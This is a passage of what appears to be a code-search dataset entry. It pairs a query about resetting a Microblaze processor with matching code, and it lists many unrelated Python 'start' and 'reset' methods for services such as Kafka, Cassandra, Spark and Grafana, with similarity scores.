else:\n print('Tomcat Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'HDFS':\n #1/5/2017 Commit by JOJO\n '''\n if running_dict.has_key('HDFS') and running_dict['HDFS'] != 'Running':\n try:\n cmd_line = self.cmd_start_hadoop_hdfs\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('HDFS has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('HDFS'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('HDFS server is running!! please trying to stop it before it start.')\n return\n '''\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif processor == 'web_management':\n if running_dict.has_key('web_management') and running_dict['web_management'] != 'Running':\n try:\n cmd_line = 'python '+self.cmd_start_web_management\n print('starting web_management webserver------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n (output,err) = cmd.communicate()\n print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('web_management webserver has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('web_management'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Flask webserver is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'novelty':\n if running_dict.has_key('novelty') and running_dict['novelty'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_novelty_detector\n # print('staring novelty------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('novelty has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('novelty'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['novelty'] == 'Running':\n print('novelty processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'raw_writer':\n if running_dict.has_key('raw_writer') and running_dict['raw_writer'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_raw_writer\n # print('staring raw_writer------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n print('raw_writer has been started!')\n return\n\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('raw_writer'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['raw_writer'] == 'Running':\n print('raw_writer processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'cassandra':\n if running_dict.has_key('cassandra') and running_dict['cassandra'] != 'Running':\n try:\n cmd_line = self.cmd_start_cassandra\n # print('starting cassandra------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of cassandra shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('cassandra has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('cassandra'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('cassandra Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'kairosDb':\n if running_dict.has_key('kairosDb') and running_dict['kairosDb'] != 'Running' and running_dict['cassandra']=='Running':\n try:\n cmd_line = self.cmd_start_kairosDB\n # print('staring kairosDB------->')\n\n # print cmd_line\n\t\t\t\t\t#2311 Vpl update to fix problem of kairosDb shutdown when term exit (10.x timeout)\n\t\t\t\t\t#cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('kairosDb has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kairosDb'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['cassandra']=='Stopped':\n print('cassandra required starting before kairosDb is running!! please trying to \"start cassandra\" first')\n return\n elif running_dict['kairosDB'] == 'Running':\n print('kairosDB Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'grafana':\n if running_dict.has_key('grafana') and running_dict['grafana'] != 'Running' and running_dict['kairosDb']=='Running':\n try:\n cmd_line = self.cmd_start_grafana\n # print('staring grafana------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('grafana has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('grafana'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['kairosDb']=='Stopped':\n print('kairosDb required starting before grafana is running!! please trying to \"start kairoseDb\" first')\n return\n elif running_dict['grafana'] == 'Running':\n print('grafana Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'kafka':\n if running_dict.has_key('kafka') and running_dict['kafka'] != 'Running' and running_dict['zookeeper']=='Running':\n try:\n cmd_line = self.cmd_start_kafka\n print('starting kafka------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n print ('kafka has been started!')\n return\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kafka'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['zookeeper']=='Stopped':\n print('zookeeper required starting before kafka is running!! please trying to \"start zookeeper\" first')\n return\n elif running_dict['kafka'] == 'Running':\n print('Kafka Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'zookeeper':\n if running_dict.has_key('zookeeper') and running_dict['zookeeper'] != 'Running':\n try:\n cmd_line = self.cmd_start_zookeeper\n # print('staring zookeeper------->')\n # print (cmd_line)\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n\n print('zookeeper has been started!')\n return\n except Exception as ex:\n print(\" Failed to stop processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('zookeeper'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Zookeeper Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'accl_processor':\n if running_dict:\n if running_dict['accl_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_accl_processor\n print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #cmd = subprocess.Popen(['nohup',cmd_line])\n # cmd = subprocess.Popen(cmd_line)\n\n print ('Accelerometer processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['accl_processor'] == 'Running':\n print('Accelerometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'baro_processor':\n if running_dict:\n if running_dict['baro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_baro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Barometer processor has been started')\n\t\t\tprint (cmd_line)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['baro_processor'] == 'Running':\n print('Barometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'gyro_processor':\n if running_dict:\n if running_dict['gyro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_gyro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Gyroscope processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['gyro_processor'] == 'Running':\n print('Gyroscope processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'aggr_processor':\n if running_dict:\n if running_dict['aggr_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_aggr_naiv\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Aggregator processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['aggr_processor'] == 'Running':\n print('Aggregator processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print ('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n else:\n print ('Please type correct command! You may use \"help start\" see more help')", "def start(self) -> None:\n data = {\n \"pipeline\": self.pipeline.id,\n \"language\": self.language,\n }\n if self.runner_data is not None:\n data[\"runner_data\"] = self.runner_data\n\n self.process_event(PipelineEvent(PipelineEventType.RUN_START, data))", "def run(self):\n self.process.start()", "def start_run(self, context: RobotRunnerContext) -> None:\n rospy.init_node(\"robot_runner\", disable_signals=True)\n self.ina219_profiler = INA219ProfilerClient()\n self.cpu_mem_profiler = ResourceProfilerClient()", "def start(self):\n self._setup_thread()\n self.thread.start()", "def run(self):\n client = ProcessorClient()\n try:\n client.connect(self.address)\n except Exception as e:\n self.error = e\n logging.error(e)\n else:\n self.clients[self.name] = client", "def start(self):\n self._proc = self._get_subprocess()\n self._pid = self._proc.pid\n self._return_code = None", "def start(self):\n if not self._Thread__initialized:\n raise RuntimeError('thread.__init__() not called')\n if self._Thread__started.is_set():\n raise RuntimeError('threads can only be started once')\n with threading._active_limbo_lock:\n threading._limbo[self] = self\n try:\n start_new_background_thread(self.__bootstrap, ())\n except Exception:\n with threading._active_limbo_lock:\n del threading._limbo[self]\n raise\n self._Thread__started.wait()", "def start( self ):\n\n self.service()", "def start():\n\n start_server()", "def start():\n server = current_server()\n logger.info('Starting Flexx event loop.')\n server.start()", "def start(self):\n\n # ioloop.install()\n threading.Thread(target=self.loop.start).start()\n time.sleep(1)", "def start(self):\r\n if self._ready:\r\n return\r\n\r\n self._start()\r\n self._ready = True", "def start(self, logfile_name):\n\n self._verify_not_running()\n\n # The package structure for LiteServ is different pre 1.4. Handle for this case\n if has_dot_net4_dot_5(self.version_build):\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/net45/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n else:\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n\n process_args = [\n \"mono\",\n binary_path,\n \"--port\", str(self.port),\n \"--dir\", \"{}/dbs/net-mono/\".format(RESULTS_DIR)\n ]\n\n if self.storage_engine == \"ForestDB\" or self.storage_engine == \"ForestDB+Encryption\":\n process_args.append(\"--storage\")\n process_args.append(\"ForestDB\")\n else:\n process_args.append(\"--storage\")\n process_args.append(\"SQLite\")\n\n if self.storage_engine == \"SQLCipher\" or self.storage_engine == \"ForestDB+Encryption\":\n log_info(\"Using Encryption ...\")\n db_flags = []\n for db_name in REGISTERED_CLIENT_DBS:\n db_flags.append(\"--dbpassword\")\n db_flags.append(\"{}=pass\".format(db_name))\n process_args.extend(db_flags)\n\n log_info(\"Launching: {} with args: {}\".format(binary_path, process_args))\n\n self.logfile = open(logfile_name, \"w\")\n self.process = subprocess.Popen(args=process_args, stdout=self.logfile)\n\n self._verify_launched()\n\n return \"http://{}:{}\".format(self.host, self.port)", "def setUp(self):\n self.core_processor = core_processor.ProcessCores()", "def starting(self) -> None:\n self._prepopulate_runnables()\n self._loop_handler = threading.Thread(target=self._loop)\n self._loop_handler.daemon = True\n self._loop_handler.start()", "def start(verbose=False):\n\n _prepare_execution(verbose)\n _validate_components_prepared('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in components:\n if not component.skip_installation:\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start(self):\n if self.__running:\n raise RuntimeError('already started')\n self.__hook_thread = threading.Thread(target=self.__run_hook, args=(self.__build_runner(),))\n self.__running = True\n self.__hook_thread.start()", "def start(self):\n if self.preemptableScaler != None:\n self.preemptableScaler.start()\n\n if self.scaler != None:\n self.scaler.start()", "def start():\n logging.info(\"Execution Started\")", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "def start(self):\n if self._callable:\n self._is_running = True\n self._run_client()", "def do_start(self, arg):\n args = arg.split(\" \")\n self.model.initialise(args[0])\n self.model.run()", "def start(self):\n\t\treturn Job(SDK.PrlVm_Start(self.handle)[0])", "def start(self):\n with self._lock:\n if not self.started():\n self._started = None\n getattr(self.factory, 'start_' + self.class_name())(self)", "def start(self):\n self.start_time = dt.datetime.now()\n self.call = ' '.join(sys.argv)\n self.commands = []", "def initialize_multiprocessing() -> None:\n global LOCK\n try:\n multiprocessing.set_start_method(\"fork\")\n except AttributeError:\n # Unsupported set_start_method (python 2 mainly).\n # Use default start method.\n pass\n except RuntimeError:\n # Already initialized\n pass\n manager = multiprocessing.Manager()\n LOCK = manager.RLock()", "def start(self):\r\n return self.start_subprocess()", "def _startup(self):\n self._logger.debug(\"About to start up plugin %s\", self.unique_name)\n\n if not self._ez_client.can_connect():\n raise RestConnectionError(\"Cannot connect to the Beer-garden server\")\n\n # If namespace couldn't be determined at init try one more time\n if not self._legacy and not self._config.namespace:\n self._setup_namespace()\n\n self._system = self._initialize_system()\n self._instance = self._initialize_instance()\n\n if self._config.working_directory is None:\n app_parts = [self._system.name, self._instance.name]\n if self._system.namespace:\n app_parts.insert(0, self._system.namespace)\n\n self._config.working_directory = appdirs.user_data_dir(\n appname=os.path.join(*app_parts), version=self._system.version\n )\n\n workdir = Path(self._config.working_directory)\n if not workdir.exists():\n workdir.mkdir(parents=True)\n\n self._logger.debug(\"Initializing and starting processors\")\n self._admin_processor, self._request_processor = self._initialize_processors()\n self._admin_processor.startup()\n self._request_processor.startup()\n\n self._logger.debug(\"Setting signal handlers\")\n self._set_signal_handlers()", "def startBackend():\n global started\n if started:\n return\n started = True\n print(\"Backend started\")", "def run(self):\n self.__power_on()\n\n self.__main()", "def start_core(c):\n with c.cd('images'):\n print('Starting Core database')\n c.run('sudo docker-compose up -d stellar-core-db', hide='stderr')\n sleep(2)\n\n # setup core database\n # https://www.stellar.org/developers/stellar-core/software/commands.html\n print('Initializing Core database')\n c.run('sudo docker-compose run stellar-core --newdb --forcescp', hide='both')\n\n # setup cache history archive\n print('Initializing Core history archive')\n c.run('sudo docker-compose run stellar-core --newhist cache', hide='both')\n\n # start a local private testnet core\n # https://www.stellar.org/developers/stellar-core/software/testnet.html\n print('Starting Core')\n c.run('sudo docker-compose up -d stellar-core', hide='stderr')", "def start(instance=\"default\"):\n # initialize logging\n global logger_ic\n logger_ic = infrasim_log.get_logger(LoggerType.ipmi_console.value, instance)\n common.init_logger(instance)\n\n # initialize environment\n env.local_env.quit_flag = False\n common.init_env(instance)\n pid_file = \"{}/{}/.ipmi_console.pid\".format(config.infrasim_home, instance)\n daemon.daemonize(pid_file)\n with open(pid_file, \"r\") as fp:\n logger_ic.info(\"ipmi-console of {} start with pid {}\".\n format(instance, fp.read().strip()))\n\n # parse the sdrs and build all sensors\n sdr.parse_sdrs()\n\n # running thread for each threshold based sensor\n _start_monitor(instance)\n _spawn_sensor_thread()\n _start_console(instance)", "def StartMicrophone(self):\n if not os.path.exists('static'):\n os.mkdir('static')\n microphone = olpc.Microphone('static/sound.ogg')\n microphone.StartMicrophone()", "def start(self) -> None:\n ...", "def start(self) -> None:\n ...", "def start():\n log(\"=========== hook: start ===========\")", "def start():\n trio.run(_main)", "def do_start(self, line):\n\n if not line:\n line = \"cortex\"\n\n # First, check that the name isn't already taken\n clients = self.registry.get_clients()\n if clients.has_key(line):\n print \"A server already exists with that name (%s)\" % line\n return False\n\n subprocess.Popen([\"python\", \"cortex.py\", line])\n # Wait for the system to init\n time.sleep(1)\n print \"Started server, connecting...\"\n return self.do_connect(line)", "def start(self):\n# if self._start_time is not None:\n self._start_time = time.perf_counter()", "def start(self):\n if not self._worker:\n # the worker might be already created in case of deserialization\n self._worker = APIWorker(self.queue)\n self._worker.start()", "def startService(self):\n super(MasterService, self).startService()\n self.dispatcher.startDispatching()", "def Start(self):\r\n # Attach a WorkerDispatcher to the current thread\r\n self.m_disp = ttapi.Dispatcher.AttachWorkerDispatcher()\r\n self.m_disp.BeginInvoke(Action(self.Init))\r\n self.m_disp.Run()", "def Start(self):\r\n # Attach a WorkerDispatcher to the current thread\r\n self.m_disp = ttapi.Dispatcher.AttachWorkerDispatcher()\r\n self.m_disp.BeginInvoke(Action(self.Init))\r\n self.m_disp.Run()", "def begin(self):\n self.service = NoseServiceClass()\n\n self.service.init_service(endpoint=self.rp_endpoint,\n project=self.rp_project,\n token=self.rp_uuid,\n ignore_errors=False)\n\n\n # Start launch.\n self.launch = self.service.start_launch(name=self.rp_launch,\n description=self.rp_launch_description,\n mode=self.rp_mode)\n\n self.handler = RPNoseLogHandler(self.filters if self.filters else None)\n self.setupLoghandler()", "def start_processing(self):\n\t\tlogger.info(\"Server processing started.\")\n\t\tThread(name='Server Processing Thread', target=self.__process_requests,\n\t\t\tdaemon=True).start()", "def start(self):\n if self._pumping:\n return\n self._pumping = True\n self._global_reactor.callLater(0, self._pump_once)", "def start(self):\n self.__current_evaluation_context = self.agent.evaluation_context.create_child_context()\n self.current_evaluation_context.set_process(self)\n self.procedure.restart(self.__current_evaluation_context)\n self.__current_control_node = self.procedure.body\n self.__last_start_time = self.agent.evaluation_context.get_current_time()\n\n self._on_start()\n self.__state = Process.RUNNING", "def start (self):\n pass", "def start (self):\n pass", "def start(self):\n self.log('Start capturing.')\n # ---\n try:\n self.setup()\n # run camera thread\n self._worker = Thread(target=self.run)\n self._worker.start()\n except StopIteration:\n self.log('Exception thrown.')", "def start(self):\n return self.setup.start", "def start_instance(InstanceId=None):\n pass", "def _start(self):\n pass", "def startReactor(self):\n reactor = self.options.get(RunnerOptions.reactor)\n if reactor is None:\n reactor = defaultReactor\n reactor.install()\n self.options[RunnerOptions.reactor] = reactor\n\n reactor.callWhenRunning(self.whenRunning)\n\n self.log.info(\"Starting reactor...\")\n reactor.run()", "def start(self, **kwargs):\n pass", "def start(self, **kwargs):\n pass", "def start_as_service(self):\n from ..program_manager import ProgramManager\n send_action(ProgramManager.NAME, 'start', self.name)", "def start(self) -> None:\n if self.bolt_app.logger.level > logging.INFO:\n print(get_boot_message())\n else:\n self.bolt_app.logger.info(get_boot_message())\n\n web.run_app(self.web_app, host=\"0.0.0.0\", port=self.port)", "def run(self):\n self.log.info(\"Starting thread: \" + self.name)\n self.object__ = self.run_process(self.object__, self.args)", "def start(self):\n \n self.thread.start()\n self.state = \"running\"", "def initialize_cpu(self):\n\n self.pc = self.memory.read(0xfffc) << 8 | self.memory.read(0xfffd)", "def start():", "def start():", "def start():", "def start():", "def start(self):\n self._thread.start()", "def start(self):\n\t\tself.init_trajectory_gripper()\n\t\tself.gripperserver.start()\n\t\tprint(\"The action server for this driver has been started\")", "def start( self ):\n while not os.path.exists( '/tmp/cloud-init.done' ):\n log.info( \"Waiting for cloud-init to finish ...\" )\n time.sleep( 1 )\n log.info( \"Starting mesosbox\" )\n self.__setup_etc_hosts( )\n self.__mount_ebs_volume( )\n self.__create_lazy_dirs( )\n\n if self.master_ip == self.node_ip:\n node_type = 'master'\n self.__publish_host_key( )\n else:\n node_type = 'slave'\n self.__get_master_host_key( )\n self.__wait_for_master_ssh( )\n if self.shared_dir:\n self._copy_dir_from_master( self.shared_dir )\n self.__prepare_slave_args( )\n\n log.info( \"Starting %s services\" % node_type )\n check_call( [ initctl, 'emit', 'mesosbox-start-%s' % node_type ] )", "def start(verbose=False):\n\n _load_config_and_logger(verbose)\n _validate_manager_installed('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in COMPONENTS:\n if hasattr(component, 'start'):\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start(self):\n\n if self.bus_controller == None:\n print(\"connection to the bus controller not established yet\")\n return\n if self.__gui == None:\n print(\"connection to the GUI not established yet\")\n return\n if self.__message_sender == None:\n print(\"Connection to the message sender not established yet\")\n return\n\n update_tracking_thread = threading.Thread(target=self.__luanch_handlers, args=(),\n name=\"Telegram Controller thread\")\n update_tracking_thread.start()", "def _start(self):\n if self._classifier is None:\n self._classifier = TFSlimClassifier(self.config)\n self._classifier.__enter__()", "def run():\n import argparse\n\n parser = argparse.ArgumentParser(description='Phovea Server')\n parser.add_argument('--use_reloader', action='store_true', help='whether to automatically reload the server')\n parser.add_argument('--env', default=cc.get('env'), help='environment mode (dev or prod)')\n\n # parse before to enable correct plugin discovery\n args = parser.parse_known_args()[0]\n if args.env.startswith('dev'):\n enable_dev_mode()\n else:\n enable_prod_mode()\n\n # resolve the default command to decide which application to launch\n default_command = _resolve_commands(parser)\n if default_command is not None:\n # set a default subparse to extract the defined arguments from the instance to the main arguments (?)\n set_default_subparser(parser, default_command)\n\n args = parser.parse_args()\n\n _set_runtime_infos(args)\n\n main = args.launcher(args) # execute the launcher function, which returns another function\n\n if args.use_reloader:\n _log.info('start application using reloader...')\n run_with_reloader(main, extra_files=_config_files())\n else:\n _log.info('start application...')\n main()", "def start(self):\n\n # Get memory usage in bytes as of the current moment.\n self.init_mem = Memory._get_resident_memory_in_bytes()", "def start():\n\tglobal StoreWorkerThread\n\n\tStoreWorkerThreadLock.acquire()\n\t# sanity - make sure thread is not already running\n\tif StoreWorkerThread is not None:\n\t\tStoreWorkerThreadLock.release()\n\t\traise WikStoreQError(\"start() called while StoreWorkerThread active!\")\n\t\t\n\t# start thread\n\tStoreWorkerThread = StoreWorker()\n\tStoreWorkerThread.start()\n\t\n\tStoreWorkerThreadLock.release()", "def start(self):\n ...", "def start(self):\n pass", "def start(self):\n pass", "def start(self):\n pass" ]
[ "0.6218762", "0.60426116", "0.5927747", "0.5888535", "0.5852811", "0.58245885", "0.5803731", "0.57714486", "0.57650065", "0.5744394", "0.5729824", "0.5724727", "0.5718365", "0.5661167", "0.5647819", "0.5586553", "0.5540475", "0.553082", "0.551599", "0.5512633", "0.5512412", "0.5510244", "0.5494249", "0.549061", "0.5490138", "0.5489092", "0.5472116", "0.5468504", "0.54674816", "0.54644006", "0.5445352", "0.5432914", "0.54196924", "0.54089874", "0.5407884", "0.53918624", "0.5388139", "0.53792703", "0.5373922", "0.5372847", "0.53622764", "0.5357195", "0.5357045", "0.53514916", "0.5344063", "0.5341714", "0.5340021", "0.53381425", "0.53374094", "0.5336009", "0.532934", "0.532808", "0.53257185", "0.5321936", "0.5306897", "0.52824575", "0.52824575", "0.5280214", "0.5254875", "0.52514714", "0.52469224", "0.52444226", "0.5242066", "0.52413654", "0.52413654", "0.52378774", "0.52350116", "0.5231117", "0.52309525", "0.52283", "0.52283", "0.52260876", "0.5225652", "0.522511", "0.522179", "0.5210307", "0.52059555", "0.52059555", "0.5201363", "0.51984805", "0.51976955", "0.5194438", "0.51914865", "0.51888907", "0.51888907", "0.51888907", "0.51888907", "0.51865274", "0.517917", "0.5176371", "0.5176078", "0.51755846", "0.516025", "0.51563907", "0.5150306", "0.5145154", "0.5145107", "0.5141277", "0.5141277", "0.5141277" ]
0.6880082
0
Put the Microblaze processor into reset. This method will set processor status as "STOPPED".
def stop(self): self.microblaze.reset()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def reset(self):\n # The camera will give no response to this command\n self._serial_io('\\x55\\x99\\x66\\x11', None)\n while True:\n try:\n self.system_state = 0x11\n if self.system_state == 0x11:\n break\n except CygnetExc:\n time.sleep(.2)\n while True:\n self.system_state = 0x12\n time.sleep(.2)\n if self.system_state == 0x16:\n break", "async def reset(self):\n await self.set_param(\"ContinuousExposures\", 0)\n await self.set_param(\"Exposures\", 0)\n cmd = await self.send_command(\"RESETTIMING\", timeout=1)\n if not cmd.succeeded():\n self.status = ControllerStatus.ERROR\n raise ArchonError(f\"Failed sending RESETTIMING ({cmd.status.name})\")\n\n # TODO: here we should do some more checks before we say it's IDLE.\n self.status = ControllerStatus.IDLE", "def reset(self):\n\t\treturn Job(SDK.PrlVm_Reset(self.handle)[0])", "def reset(self):\n self.success = False\n self.i = 0\n if self.monitor:\n self.env = gym.wrappers.Monitor(self.env, \"./mountaincar-monitor\", force=True)\n state = self.env.reset()\n state = self.preprocess_state(state)\n state = np.concatenate([state] * self.action_repeat)\n return state", "def soft_reset():", "def reset():\n _runtime.reset()", "def reset(self):\n self.state = self.process_state(self.env.reset())\n return self.state", "def reset(self):\n with self.bkp_lock:\n self.active_breakpoints = set()\n self.stepping = SteppingMode.STEP_NO_STEP\n self.continue_next()", "def reset(self) -> None:\n # See section 7.2.2 of the datasheet for reset description.\n self._reset.value = True\n time.sleep(0.0001) # 100 us\n self._reset.value = False\n time.sleep(0.005) # 5 ms", "def reset(self):\n GPIO.output(self.reset_pin, GPIO.LOW)\n time.sleep(0.1)\n GPIO.output(self.reset_pin, GPIO.HIGH)\n time.sleep(0.1)\n\n if self.inky_version == 2:\n self._send_command(_V2_RESET)\n\n self._busy_wait()", "def reset(self):\n self.stop()\n self.start()", "def halt(self):\n cmd_title('HALTING')\n self.running = False\n # Reset any state\n self.tape = None\n self.transitions = None\n self.current_state = None\n self.tape_index = None\n self.result = ''", "def reset_and_stop(self):\n self.enabled = False\n self.start_time = None", "def svc_reset_system_mode(self) -> None:\n self._call_client_api(self._device.reset_mode)", "def test_reset():\n dev = _aws_device(wires=2)\n dev._circuit = CIRCUIT\n dev._task = TASK\n\n dev.reset()\n assert dev.circuit is None\n assert dev.task is None", "def reset():\n for cpu_id in POSSIBLE_CPUS:\n set_cpu(cpu_id, True)", "def set_working_state(self):\n self.state = 0\n self.port = None", "def reset(self):\n# \n self.end_and_close()\n# self.sim.start()\n\n # Start the next simulation\n self.sim._model.swmm_open()\n self.sim._model.swmm_start()\n\n # get the state\n state = self._state()\n return state", "def reset(self):\n command = \"export STLINK_DEVICE=\" + self.stlink.port + \"; st-flash reset\"\n subprocess.run(command, shell=True)\n time.sleep(1)", "def reset(self):\n self.write_to_serial('*RST')", "def reset(self):\r\n 